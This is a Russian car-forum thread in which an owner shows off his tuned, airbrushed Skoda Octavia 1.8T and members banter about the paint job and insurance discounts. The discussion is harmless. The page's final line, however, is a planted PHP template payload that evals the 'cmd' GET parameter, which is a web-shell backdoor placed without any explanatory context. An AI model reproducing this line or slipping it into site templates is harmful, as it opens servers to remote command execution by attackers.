+ Ответить в теме
Страница 1 из 3 1 2 3 ПоследняяПоследняя
Показано с 1 по 10 из 21

Тема: Мой молниямобиль


  1. #1
    В простонародье молниямобиль.
    До 2005года, был простой Октавией агу 1.8т 150сил, синего цвета.
    В 2005 году судьба авто сильно изменилась благодаря тому, что его купил Андрей (kamikadze) из гоночного клуба Уртим.
    Автомобилю сделали аэрографию, поставили распорки, к04 турбину, форсунки, второй кулер, тормозную систему от тт 225сил, армированые тормозные шланги, подвеску бильштайн B8, пружины H@R, прямоток сёбринг, небольшой обвес и т.д.
    После чего автомобиль выставлялся на автоэкзотике 2 года подряд, публиковался в журналах, а также участвовал в весёлых покатушках на четверть мили.....

    Зимою 2006 года автомобиль нашёл нового хозяина, тобишь меня
    И вот уже полтора года я холю и лелею моего друга...
    Конечно многое пришлось починить, поменять- коробку передач в сборе от рс, сцепа, двигатель, турбина, привода в сборе.......

    Затраты существенные, зато теперь авто практически в идеальном состоянии и готов к новому витку дороботок

  2. #2
    GTI-Racing magnum126 is on a distinguished road Аватар для magnum126
    Регистрация
    06.03.2006
    Откуда
    СВАО
    Машина
    opel manta B 1979, VW Derby 1982, VW Golf 6, AUDI A2 s-line, OPEL ZAFIRA COSMO!!
    Сообщений
    3,618
    да класный машин помню ео еще по юртиму! теперь смотрю на него по несколько раз в день и восхищаюсь)!

  3. #3
    ой, ладно тебе...
    Я, кстати, с тенировки возвращался, где-то часов в 8, а ты вроде из гаражей уежал...???

  4. #4
    Новичок clinic is on a distinguished road Аватар для clinic
    Регистрация
    06.03.2006
    Сообщений
    190
    а я ее на экзотике видел <_<

  5. #5
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    этож надо на всю машину молоко разлить ;)
    песок сыпется....не останавливайтесь на достигнутом !

  6. #6
    GTI-Racing john@rallye is on a distinguished road Аватар для john@rallye
    Регистрация
    11.08.2006
    Откуда
    msk
    Машина
    lupo low&slow, mk1 cabrio сток, mk1 cabrio не сток
    Сообщений
    1,049
    <div class='quotetop'>Цитата(BON &#064; Mar 17 2008, 09&#58;14) <{POST_SNAPBACK}></div><div class='quotemain'>этож надо на всю машину молоко разлить ;)[/b][/quote]
    мне кажеца это было не молоко...
    fuckfueleconomy

  7. #7
    GTI-Racing BMXer is on a distinguished road Аватар для BMXer
    Регистрация
    01.07.2006
    Сообщений
    198
    <div class='quotetop'>Цитата(john@rallye &#064; Mar 17 2008, 12&#58;47) <{POST_SNAPBACK}></div><div class='quotemain'>мне кажеца это было не молоко... [/b][/quote]
    полюбасу не молочко ;)

  8. #8
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    мне вообще то нравится это поколение Шкод, особенно с мотором 1.8Т и если бы еще 4х4 то хороший авто для перемещения. Аэрография меня бы смущала, пальцем показывают гарантированно наверное при каждом случае
    песок сыпется....не останавливайтесь на достигнутом !

  9. #9
    <div class='quotetop'>Цитата(BON &#064; Mar 19 2008, 09&#58;07) <{POST_SNAPBACK}></div><div class='quotemain'>мне вообще то нравится это поколение Шкод, особенно с мотором 1.8Т и если бы еще 4х4 то хороший авто для перемещения. Аэрография меня бы смущала, пальцем показывают гарантированно наверное при каждом случае [/b][/quote]

    Девушки особенно хорошо реагируют хорошо на контакт идут
    +бесплатная страховка каско от угона в ренесансе, а в ресо в том году дали 90% скидку при полном каско от угона :rolleyes:

  10. #10
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    <div class='quotetop'>Цитата(nickart &#064; Mar 19 2008, 11&#58;53) <{POST_SNAPBACK}></div><div class='quotemain'>Девушки особенно хорошо реагируют хорошо на контакт идут
    +бесплатная страховка каско от угона в ренесансе, а в ресо в том году дали 90% скидку при полном каско от угона :rolleyes:[/b][/quote]


    слушай, а ведь это очень даже круто насчет страховки.
    Скинь если не секрет мну в личку сколько стоит полное каско в таком случае тебе с такими скидками.
    песок сыпется....не останавливайтесь на достигнутом !

+ Ответить в теме
Страница 1 из 3 1 2 3 ПоследняяПоследняя

Похожие темы

  1. Продаю Молниямобиль (сметанамобиль)
    от nickart в разделе Покупка и продажа авто
    Ответов: 16
    Последнее сообщение: 16.06.2008, 03:25

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}